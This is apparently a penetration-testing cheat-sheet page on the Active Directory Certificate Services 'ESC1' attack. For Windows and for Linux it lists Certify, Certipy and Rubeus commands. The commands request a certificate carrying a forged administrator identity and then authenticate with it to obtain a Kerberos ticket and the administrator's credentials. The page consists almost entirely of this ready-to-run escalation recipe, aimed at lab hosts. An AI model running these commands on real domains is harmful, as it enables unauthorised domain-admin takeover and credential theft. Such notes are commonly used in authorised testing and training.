Skip to main content

ESC1

ESC1

Windows

Certificate Request with alternative SAN

.\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:ESC1 /altname:administrator@lab.local

Convert the certificate PEM to pfx

Certificate Authentification

.\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap

Linux

Certificate Request with alternative SAN

certipy req -u user1@local.lab -p "pass1" -ca lab-LOCAL-DC-CA -template SSL -upn administrator@local.lab -dc-ip 10.10.10.10
certipy req -u user1@local.lab -p 'pass1' -ca lab-LOCAL-DC-CA -upn Administrator -template ESC1 -dc-ip 10.10.10.10

Note: If we get an error: The NETBIOS connection with the remote host timed out, just try again.

Certificate Authentification

certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10